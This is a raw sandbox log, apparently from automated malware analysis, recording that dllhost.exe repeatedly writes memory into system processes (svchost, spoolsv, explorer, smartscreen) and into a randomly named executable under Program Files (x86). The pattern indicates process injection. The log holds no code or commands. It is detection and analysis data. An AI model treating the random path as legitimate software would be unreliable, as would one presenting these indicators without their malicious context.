Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
